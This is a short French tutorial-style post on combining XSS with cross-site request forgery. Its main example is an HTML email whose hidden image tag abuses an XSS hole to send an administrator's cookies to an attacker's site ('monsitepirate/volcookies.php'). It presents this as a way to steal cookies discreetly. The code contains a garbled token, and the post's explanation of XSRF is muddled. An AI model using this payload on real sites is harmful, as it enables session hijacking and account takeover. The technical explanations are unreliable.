XSS et XSRF

Voilà une faille peu commune et pourtant elle fait des dégâts.

La XSRF (Cross Site Request Forgeries) permet d'exécuter du code par l'intermédiaire de la balise IMG sans que la personne ne s'en aperçoivent.

Je ne vais pas m'attarder à vous expliquer ce qu'est une XSRF, comment l'exploiter ... Tout est expliqué ici. 

D'après les chercheurs en sécurité informatique la faille XSS couplée à la XSRF peut faire beacoup de dégat.

Vous pouvez l'utiliser pour voler de manière plus subtile les cookies.

Comme expliqué sur wiki, la manière la plus efficace en terme d'exploitation du sea-surfing Consiste à cacher le code dans l'attribut source de la balise image.

Exemple : J'ai repéré une faille XSS sur un site lambda (exemple : https://sitefaillible/search.php?motclef=javascript:alert("XSS trouvée");)

Je veux récupérer les cookies de l'administrateur sachant qu'il est déjà logué en tant qu'admin. Je lui envoie donc un email au format HTML comme qui suit :

Code : HTML

< !-- du code -->

< IMG SRC="https://sitefaillible/search.php?motclef=javascript:RubicusFrontendIns.location.href='https://monsitepirate/volcookies.php?cookie='+document.cookie;" />

< !-- encore du code --> 

En ouvrant son email, l'administrateur ne verra pas l'image est croira que c'est due à une erreur d'affichage et oubliera cette incident avec le temps.

Comme vous l'avez vu une XSRF et une XSS peuvent faire très ... très ... mal.